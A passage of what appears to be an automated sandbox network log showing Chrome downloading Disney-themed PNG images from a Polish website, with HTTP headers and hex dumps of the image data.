                                                            2025-01-15 10:08:06 UTC8000INData Raw: b2 98 5d 5b c5 5a 5a 85 ea 6c 3a b6 f2 02 88 ea 8b 3e d2 ce 07 ef f3 d1 df fd 2d fb ef bf 4f ef e9 33 cc 41 88 4a c0 8f 35 5b cf 9e d2 f9 77 ff 8e 1b 6f bf c1 9d d7 5e 63 71 6d 85 9b 6f bd 81 ab 4c 6a a5 32 85 9c 47 14 c7 ec 9c 1c 21 2b 65 ae be fd 16 ab 37 ae 21 4c 93 61 e0 d3 09 c6 f4 03 9f 38 48 0d 5b 0f 76 76 f8 9b ff f3 df b2 fa d2 2d 5e f9 c1 f7 b8 fa 8d d7 28 6f 5c 41 c5 02 17 13 45 ca 01 3b 1b f7 31 72 2e d7 6e 5e 63 71 6d 05 72 36 e3 24 a0 17 87 74 a2 04 3f 04 1d 41 f3 a0 c1 93 bf f9 6b ea b7 ae f1 9d 1f fe 88 57 de 7e 93 a5 e5 55 88 34 8e e5 60 49 45 12 c7 1c 9e 9e 12 28 c5 b5 37 df 60 f5 f6 2d 8c 85 59 72 5a 71 fd 7b df 22 91 09 5b f7 1f 90 c4 60 0d 87 3c 7a f7 3d 4e 77 0f 98 bb 71 8d 62 bd 8e e1 ba 44 71 4c bf d7 65 f7 e8 90 9d 93 63 8c 99 19
                                                            Data Ascii: ][ZZl:>-O3AJ5[wo^cqmoLj2G!+e7!La8H[vv-^(o\AE;1r.n^cqmr6$t?AkW~U4`IE(7`-YrZq{"[`<z=NwqbDqLec
                                                            2025-01-15 10:08:06 UTC6822INData Raw: 38 96 f5 ae 2e 0f 90 a3 93 0b 2d f7 34 d1 7c 2e e3 33 dd 23 9c 02 d6 34 7e 47 86 35 71 6d bf dc d4 ba 44 bd 4a 8b 3d 0d 12 8d 14 22 15 9f 53 32 bd 21 88 e3 84 d1 68 c4 f1 c9 29 8d e3 46 ea 1e 63 98 04 61 d6 d7 92 0a 27 97 a3 58 ab 62 78 0e 61 da d9 82 44 13 fa 3e c1 68 04 61 00 3a fc d2 4a d5 10 45 8c fb 29 21 95 28 25 a4 c6 1a 30 0c 54 ce 43 14 8b 50 a9 52 5c 59 a1 b6 b6 46 bf ef 33 ea 77 89 63 18 b6 ce 39 b8 ff 39 e6 cc 2c 33 f9 02 94 93 f4 c9 42 12 1d 1d 72 70 ff 0b f6 be 78 48 30 18 21 14 8c 14 e4 6a 15 ea b7 ae 53 5e 5e 4c 4d 30 d0 c8 38 46 e9 84 4b fb 8b 58 42 62 20 be 24 fa 97 95 7f 5f 3e 7f f2 85 29 27 10 99 40 a2 65 a7 bb 8f 19 71 74 3a 33 38 05 ac 69 fc 2e b8 d2 a9 dc 6f ba f6 c4 45 d7 c4 50 26 b6 69 61 4a 95 2a 8d 5e 2c 56 8d 12 3a 65 07 64 7d
                                                            Data Ascii: 8.-4|.3#4~G5qmDJ="S2!h)Fca'XbxaD>ha:JE)!(%0TCPR\YF3wc99,3BrpxH0!jS^^LM08FKXBb $_>)'@eqt:38i.oEP&iaJ*^,V:ed}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            113192.168.2.1649831178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:06 UTC649OUTGET /wp-content/uploads/2015/07/disney_minnie.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:06 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:06 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:09 GMT
                                                            ETag: "4d9e-620a8b426e4f5"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 19870
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:06 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 16 0d 2a 07 7d b1 99 00 00 20 00 49 44 41 54 78 da ec bd e9 93 e4 c7 79 e7 f7 c9 fc 9d 75 1f 7d 1f d3 3d d3 33 98 19 cc 81 c1 45 90 20 b5 14 25 ca ab 35 29 69 2d 79 43 b6 d6 0a 5b 11 8e 8d d0 0b 1f 6f bc 7e e9 d8 f5 3f e0 b5 2d 47 6c 84 1d 61 af 77 c3 fb 42 2b ad 36 76 29 05 25 11 24 41 10 37 06 98 19 cc 7d 77 4f df d5 5d 77 d5 ef ca 4c bf a8 9a 0b e0 4d 00 04 c9 fc 44 54 a0 67 30 5d f5 ab ac ca ef ef fb 3c f9 e4 93 60 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58 2c 16 8b c5 62 b1 58
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME*} IDATxyu}=3E %5)i-yC[o~?-GlawB+6v)%$A7}wO]wLMDTg0]<`X,bX,bX,bX,bX
                                                            2025-01-15 10:08:06 UTC8000INData Raw: 22 f9 56 97 99 cd 12 4f f8 2b 54 16 0a 5c d2 9b dc 34 03 8e 9c 98 40 c9 0c 1c 07 2d 42 4c 30 e0 c9 17 2a 1c 3c 53 60 a3 db e4 6f 5e 7a 89 8b 17 2f f3 95 ff e8 cb e4 72 b6 e6 ca 0a d6 cf 7a 65 f0 7e b2 5d 1b b6 76 1b 04 61 48 ad 58 64 b0 33 e4 da cb 1b 4c 0c 5c 4a 91 c1 4d 5d 84 71 30 3f a0 d2 d9 15 0e 95 2c 4f fc 6a c4 74 bf c8 93 6e 9d c6 56 0b 37 76 71 84 f7 21 5f 75 5f ac ee 6f b5 36 08 02 7c b2 cd 04 2e 4b 8e 9f ae f1 e6 b9 5b 3c ff 9b cf e2 16 5c c6 75 96 48 47 8e 1a de 65 06 47 b8 0f 43 4c 21 c6 ab 85 20 f4 a8 36 4b 1b c3 de 66 0f 39 74 11 3d 90 89 8b a3 e5 87 7a d4 3b 42 52 d0 3e fa f6 10 95 f4 38 f6 6c 99 27 8f 54 71 ef a4 64 d1 10 69 9c 07 96 2d 21 a5 3a 55 a0 a7 3a f8 61 81 fa 42 81 cd ab 4d 1c 25 51 f7 12 f4 ba a2 ba 58 a0 b2 10 32 39 ef b1 79
                                                            Data Ascii: "VO+T\4@-BL0*<S`o^z/rze~]vaHXd3L\JM]q0?,OjtnV7vq!_u_o6|.K[<\uHGeGCL! 6Kf9t=z;BR>8l'Tqdi-!:U:aBM%QX29y
                                                            2025-01-15 10:08:06 UTC3935INData Raw: 39 2e 9f 0e fd 9e b0 1d a6 ad a5 1d 45 09 74 d0 da 7d 5c d7 27 e7 d6 a8 d6 aa 14 67 ab 4c ce cc 30 7c 75 84 91 ab d7 98 9e ca 92 cf 17 b8 3a 72 8d 6a b1 c8 f7 fe e8 65 32 eb 3b 6e 46 bc a6 ae 93 4e c4 48 44 36 73 ed da 08 67 cf 9f 21 6a 5b 34 a7 9a 50 cd f5 31 17 ea c3 c4 68 28 f4 40 a1 a3 61 2b 0d 97 2a b3 1e cc e4 8b 9c 3f 7f 91 e9 5c 9e 48 34 42 b1 38 4b c8 b0 68 6f 6e e5 89 03 4f b2 79 d3 46 9a d3 49 9a 92 09 e2 b1 18 89 68 84 58 2c 42 28 64 a0 6b 3a ba d2 50 9a 86 a6 29 c4 4d 6b 70 ce 49 13 34 46 3e 9f 3f f0 d1 47 1f 1d 7b f6 d9 67 d1 b4 c6 9f 68 9a 9b 35 2b a0 e6 ba 14 66 cb 14 4b 25 3c cf c7 0e 87 49 25 63 73 27 f0 6d 47 b6 1f 04 e4 8b 25 8a c5 32 51 3b 42 3c 66 cf 4d 16 5a 67 b6 5c e1 f4 6f cf f1 eb b7 de 65 70 78 98 f6 f6 36 f6 f6 f7 b3 73 c7 76
                                                            Data Ascii: 9.Et}\'gL0|u:rje2;nFNHD6sg!j[4P1h(@a+*?\H4B8KhonOyFIhX,B(dk:P)MkpI4F>?G{gh5+fK%<I%cs'mG%2Q;B<fMZg\oepx6sv


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            114192.168.2.1649832178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:06 UTC649OUTGET /wp-content/uploads/2015/07/disney_frozen.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:06 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:06 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:16 GMT
                                                            ETag: "519a-620a8b493b7bf"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 20890
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:06 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 16 0f 2c dc 28 76 2e 00 00 20 00 49 44 41 54 78 da ec bd 77 9c 65 57 75 e7 fb dd 27 dd 1c eb 56 b8 b7 62 57 57 77 75 8e ea 20 b5 5a dd 42 28 80 24 40 02 11 6c 24 c0 06 0f 38 60 1b 6c e3 e7 f9 3c 9e 3d 1e 7b 3c 7e 33 cf 06 3c c6 16 60 60 10 1a 82 24 50 40 b9 15 50 4b 6a 75 ce a9 aa bb 2b 75 e5 70 eb e6 70 c2 fb e3 56 55 57 47 e5 c8 fe 7e 3e dd f5 b9 e7 de 93 f6 39 fb 77 d6 5a 7b 9d b5 41 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME,(v. IDATxweWu'VbWWwu ZB($@l$8`l<={<~3<``$P@PKju+uppVUWG~>9wZ{A"H$D"H$D"H$D"H$D"H$D"H$
                                                            2025-01-15 10:08:06 UTC8000INData Raw: bf 7d 35 5e 6f 02 bb be 86 dd 93 29 92 93 69 6c d3 c1 51 14 dc 2e 2f c7 30 d8 7e bc 8f 86 78 9c 72 30 4e b9 2a c0 0f 9f 79 9a f2 9e fd fc fe 67 a1 2a 0a cd 2d 21 e2 0d d5 40 9e 80 c7 a2 aa a9 86 72 7d 80 ef be 78 94 c1 b1 14 77 6c 9a 43 68 56 20 fe 82 13 6a 00 a1 a0 8f 9e 63 27 78 66 f7 3e 6e ba 6e 03 ee 82 89 21 6c fc 01 cf ab 8c ae 49 a4 60 bd 09 16 d6 4c 23 5a 2a 2d 8d 2d 44 ea bd f4 0f 66 2b 77 f6 d0 30 3b ee bf 97 e5 f1 38 41 97 c0 ed 15 44 e7 c5 49 15 0a 8c 8c 1f c3 19 b1 a8 56 15 34 4d 23 9f 2c f1 ec 0f f6 73 ec b1 28 de 42 06 cb 2e f3 17 7f f9 71 be fe 9d ed e4 e3 73 49 79 34 ca 86 43 43 7d 65 94 29 a2 3a d4 57 d7 13 f2 56 12 35 33 08 c6 4d 1b 2b 1c a2 e0 d6 70 45 12 1c e9 1a e6 ef 7f f8 04 7f f7 b9 eb 59 98 88 9e 65 65 39 8e 83 2d 04 65 60 dc 72
                                                            Data Ascii: }5^o)ilQ./0~xr0N*yg*-!@r}xwlChV jc'xf>nn!lI`L#Z*--Df+w0;8ADIV4M#,s(B.qsIy4CC}e):WV53M+pEYee9-e`r
                                                            2025-01-15 10:08:06 UTC4955INData Raw: 5f 3d 4d db 5b da 5e 0f cc 53 d3 d5 d4 34 c5 2c 3e f1 9f 7e 85 8f fe ee 13 1c fd d1 0b ec 3a b8 97 7c 6e 06 2b e6 61 b4 38 33 02 ac 6b 44 b6 0d 85 19 9f e9 42 85 44 73 9c 20 82 0b 94 68 b0 7d 2a 11 38 0b ad 98 a2 ea 88 b2 28 88 42 43 80 22 34 9a 08 8d 52 16 b6 a5 88 c7 14 e3 23 63 f4 b4 37 5f 54 d4 dc 4c a5 8f bc f7 20 dd 1d 8d 7c f6 cb df e2 f3 8f 7f 8e b7 3f f4 3e f6 be 6b 1f 1d 0d 31 b2 b1 16 b2 6e 23 7f 71 7c 90 7b 76 f7 72 53 83 cd c7 fe e9 3f e6 b7 3e fe fb fc a4 77 3b 7d b7 dd c1 96 b7 6c a6 bd ad 99 99 30 62 ca 2f 50 d4 11 5a 6b 9a dd 04 31 af 95 84 e5 e0 e4 15 7f f5 f9 ef 91 ca e4 f8 37 ff f0 11 f6 dd 76 2b e9 8d 6d 4c d8 21 67 87 22 1a 62 9d 38 91 a2 12 6a 2a d3 45 ca e5 0a 6e 32 85 33 53 a0 b9 29 c5 e6 64 33 15 ed 63 1b 85 0a 0c 09 e5 10 8f 59
                                                            Data Ascii: _=M[^S4,>~:|n+a83kDBDs h}*8(BC"4R#c7_TL |?>k1n#q|{vrS?>w;}l0b/PZk17v+mL!g"b8j*En23S)d3cY


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            115192.168.2.1649833178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:06 UTC656OUTGET /wp-content/uploads/2015/07/disney_thelion_guard.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:06 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:06 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:14 GMT
                                                            ETag: "507e-620a8b471d80e"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 20606
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:06 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 16 11 22 ef d1 64 f6 00 00 20 00 49 44 41 54 78 da ec bd 77 9c 5c 57 79 ff ff 3e e7 b6 a9 db bb 7a b3 64 35 5b 96 2c 17 5c b1 0d d8 d8 26 c4 10 02 a1 85 6f 42 08 21 74 c2 f7 1b 6a 68 36 fc 88 09 35 24 60 02 a1 77 17 c0 36 b8 49 58 2e b2 9a 8b 8a d5 db 36 6d df 9d 9d 99 db ce f9 fd 71 ef ec ae 0c 24 40 8c 1c e0 bc 5f af d1 5e cd de 9d 72 66 ce e7 3e cf 73 9e e7 39 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1 60 30 18 0c 06 83 c1
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME"d IDATxw\Wy>zd5[,\&oB!tjh65$`w6IX.6mq$@_^rf>s9`0`0`0`0`0`0`0
                                                            2025-01-15 10:08:06 UTC8000INData Raw: 49 01 96 94 08 a1 b1 44 52 0a 24 d2 e7 10 52 62 21 c8 44 31 bd b1 c7 f0 ac c5 58 0b 57 c2 be 23 54 6c 1b c7 b2 19 15 36 cd 99 3c 2f 9a 37 97 5c d7 2c 66 cd 5d c8 e0 dc 85 f8 27 06 e8 0e 23 66 cd 5b c8 27 3e f9 39 e2 27 b6 b3 fd d6 6f b3 42 28 2e 28 7a f8 9a 24 7f 4a 27 19 fd 5a eb 64 35 ad e6 fa c5 89 68 c5 2a d9 3a 2c 4e 5d 44 8d 20 d2 6a ca cd 53 a9 d5 13 21 88 d3 15 44 85 40 09 4d a4 6b 69 0e 0a 84 c0 d2 9a 20 8a 51 8d 4d 2c bb ea 6a f2 eb cf a7 50 5f a4 b1 a1 9e 13 25 9f b1 52 04 56 16 27 e7 92 f1 24 72 72 8c be 27 77 b2 77 db 66 8e ef d8 4e b5 af 97 4c ba 6a 3b b3 1f 97 4e dd 56 c7 12 78 96 84 92 4d cf 91 2a e3 23 61 62 cd 45 0a ad 4c d2 a8 11 ac 53 48 e7 ac 2e 3a 3a ba a0 bc 15 4b 2a 08 34 d8 0a 47 0a 6c db 4a 77 5c 4f 26 bb ab 61 f7 a3 8f b2 e1 d8
                                                            Data Ascii: IDR$Rb!D1XW#Tl6</7\,f]'#f['>9'oB(.(z$J'Zd5h*:,N]D jS!D@Mki QM,jP_%RV'$rr'wwfNLj;NVxM*#abELSH.::K*4GlJw\O&a
                                                            2025-01-15 10:08:06 UTC4671INData Raw: 42 e2 b1 83 5e 35 51 35 b0 51 06 af c3 b0 6c 33 d5 05 d5 51 d8 68 0a 87 a6 48 1d 9d 2c 27 0c 34 b5 b0 6c a8 ae 4c f9 54 0a ef d0 91 2e db ce 1b ca d6 cf f4 00 8f 72 10 d0 c2 2a 85 73 1a 9f 97 16 8c 09 4d 59 aa ce 76 c1 ef f0 a8 a6 8b 73 50 14 55 44 5e e1 ca f0 76 99 8a a1 c2 72 29 0d 1e a5 34 51 d5 7b d1 6b 87 d2 06 45 ad bc bd 46 c6 84 2b 3b d5 60 34 be 8a f2 97 1d 79 02 b4 cf ab 6a 0d 55 01 43 1d 94 6b 58 1e 75 78 1e d1 dd 55 b1 a7 a2 6c f0 a1 0d d6 5b 0a 52 94 f1 68 1d c1 5e 48 d8 b5 68 e3 30 4a 61 9c 7f b4 d8 fc 51 6c 4a 1b 8c ae e1 8d 41 29 85 b3 d5 42 9c a0 8c 1f 7e f2 a9 e7 e6 c7 96 3c b5 28 6d 99 9a 29 17 6d bf be 1c b3 fc 86 66 73 23 61 38 54 34 a7 62 ba bd 82 61 92 32 48 23 ba 03 c7 9b 97 23 16 17 02 d2 24 a7 59 53 5c 38 5f 27 cd 2d 1b 9b 86 61
                                                            Data Ascii: B^5Q5Ql3QhH,'4lLT.r*sMYvsPUD^vr)4Q{kEF+;`4yjUCkXuxUl[Rh^Hh0JaQlJA)B~<(m)mfs#a8T4ba2H##$YS\8_'-a


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            116192.168.2.1649834178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:06 UTC662OUTGET /wp-content/uploads/2015/07/disney_miles_from_tomorrow.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:06 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:06 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:20 GMT
                                                            ETag: "6523-620a8b4d26648"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 25891
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:06 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 00 72 7c 88 ab 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e1 02 1c 16 0e 39 a8 ee a3 84 00 00 20 00 49 44 41 54 78 da ec bd 77 90 5c d9 75 a7 f9 dd e7 d2 9b f2 55 59 be 50 f0 40 a3 61 1a dd 0d b4 77 b4 22 45 8a 12 39 23 3b 8a d9 15 35 d2 ce 44 ec ce ec c6 68 23 76 a5 99 08 85 62 24 ed 04 47 6e b4 a3 58 49 13 9a 19 05 29 7a 89 64 7b df 8d 46 c3 36 80 42 01 28 54 15 ca db ac f4 99 cf de fd 23 b3 0a b6 c9 ee 66 37 49 b4 ee 17 91 51 55 99 ef dd cc 77 eb dd 5f 9e 73 ee b9 e7 82 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a 85 42 a1 50 28 14 0a
                                                            Data Ascii: PNGIHDR,r|bKGDpHYs.#.#x?vtIME9 IDATxw\uUYP@aw"E9#;5Dh#vb$GnXI)zd{F6B(T#f7IQUw_sBP(BP(BP(BP(BP(
                                                            2025-01-15 10:08:07 UTC8000INData Raw: 4e a5 36 5c c1 a0 61 89 ad 8b e3 f2 f2 32 ae e3 d6 2d 86 d6 56 5a 5b 5a 90 32 40 17 1a 08 b0 2c 0b db b6 99 9b 9b e5 f4 e9 d3 6c df be 9d de 9e 6e 7a 7b fb 08 87 c3 44 a3 31 7c 3f c0 d0 4d b6 6e d9 42 6e 6d 8d c5 86 3b d8 de d6 4e 6b 6b 2b 96 65 00 f5 05 c2 f8 3e 96 61 92 2f 16 99 9f 5f 80 c0 87 54 84 68 ab 46 e0 2e b1 76 69 0c ce 9e c3 5b 5c a1 58 f1 30 3d 0d 5c 70 6b 01 7e 35 40 ba 20 02 81 90 1a 7e d5 a7 38 57 20 a8 4a 4c c3 42 d3 4d 02 19 42 ea 69 a4 d9 86 11 1a 00 ab 19 21 5d a4 b7 88 5f 9b c3 b7 97 70 ed 15 a4 b4 09 87 ad 6b 52 ce 6f d8 f3 0f 89 90 3e 1e 10 68 1a 1a 3e 67 de 5c e2 ef e2 67 b8 72 b1 95 68 14 d0 c3 1c 3c 7c 2f 08 49 73 32 8c d5 10 ac 8a 1f 70 e6 c2 32 33 0b 05 36 75 27 d9 35 d0 46 15 c8 96 3d 8e 9c 9a e5 cc f9 65 d2 e9 04 8f dd bf 89
                                                            Data Ascii: N6\a2-VZ[Z2@,lnz{D1|?MnBnm;Nkk+e>a/_ThF.vi[\X0=\pk~5@ ~8W JLBMBi!]_pkRo>h>g\grh<|/Is2p236u'5F=e
                                                            2025-01-15 10:08:07 UTC8000INData Raw: cb 29 3f 38 73 85 d3 8b 16 cf 06 98 d4 90 35 0b 44 5c e0 03 dd ae a2 5d cf 11 71 41 58 58 ea ab b0 ba a4 09 c6 aa 8c 95 ca d4 8b 3a ab 4b 1d 0e cd 68 26 cb 23 4c 56 63 74 2f a1 be d4 26 64 9a 51 3f 22 92 19 49 b7 4b dc aa 53 19 9d 74 1d c8 01 eb c3 95 10 82 13 27 4e f0 a7 7f fa a7 6c 36 1a 7c ef 7b df 43 15 c5 0e c1 70 8b 2d 3a a8 46 c2 f0 e4 e3 bc fc d5 5f e3 ab bf f2 02 56 eb c1 f2 55 0c 16 e7 e4 da 0a c7 79 9e 33 3b 7f 90 99 f9 05 2e 6e 68 ce 9c 5f 65 e5 6a 93 a3 73 43 3c f3 e4 3c c3 c3 01 3f bc d8 42 f9 30 3e 36 44 3a 14 51 97 90 64 10 59 d0 0a f2 5e 4e d2 b5 78 e5 12 5e d5 a7 08 34 45 96 22 63 8b 30 60 84 87 30 16 6b 15 5e 10 a1 95 87 b0 83 5a ea 52 60 65 1f 58 86 9c c4 2a c2 91 87 a8 4e 1e c1 6e fa a8 ae 21 11 39 d9 a6 46 64 7d 60 09 05 79 d3 90 7b
                                                            Data Ascii: )?8s5D\]qAXX:Kh&#LVct/&dQ?"IKSt'Nl6|{Cp-:F_VUy3;.nh_ejsC<<?B0>6D:QdY^Nx^4E"c0`0k^ZR`eX*Nn!9Fd}`y{
                                                            2025-01-15 10:08:07 UTC1956INData Raw: e4 77 ab d5 ea db 40 47 08 e1 62 03 0e 58 1f cb 17 3b 2a 8a 62 61 65 65 e5 d3 af bd f6 da 73 e7 cf 9f ff 6f e7 e6 e6 e6 66 66 66 e4 d4 d4 14 33 33 33 94 4a 25 c2 30 44 4a f9 40 b9 8b 5b 90 dd ab b6 3a f8 27 c5 ed 33 c6 90 e7 39 59 96 b1 be be 4e ad 56 63 7d 7d dd ac ac ac ac 1c 3d 7a f4 cf 4f 9d 3a f5 e3 b9 b9 b9 d7 07 a3 81 2e c0 ee 80 f5 b1 7f b9 7d 6b ed 68 92 24 47 16 17 17 9f 39 7d fa f4 33 97 2e 5d fa 72 14 45 73 fb f7 ef 2f 8f 8c 8c 30 32 32 c2 d8 d8 18 e5 72 99 52 a9 84 10 c2 59 59 1f 63 58 59 6b c9 b2 8c 24 49 68 36 9b b4 db 6d da ed 36 57 af 5e 4d f2 3c bf b2 b0 b0 f0 9d 67 9e 79 e6 f4 c2 c2 c2 e9 41 52 68 cb a5 2e 38 60 3d 68 2f 7a 60 8c 99 48 92 e4 d0 fa fa fa 23 17 2e 5c 78 f4 ec d9 b3 47 ea f5 fa 33 61 18 ee 1b 19 19 19 8a a2 48 96 4a 25 e9
                                                            Data Ascii: w@GbX;*baeesofff333J%0DJ@[:'39YNVc}}=zO:.}kh$G9}3.]rEs/022rRYYcXYk$Ih6m6W^M<gyARh.8`=h/z`H#.\xG3aHJ%


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            117192.168.2.1649179178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:06 UTC418OUTGET /wp-content/uploads/2015/07/disney_sofia_the_first.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:07 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:06 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:13 GMT
                                                            ETag: "7c90-620a8b46312e2"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 31888
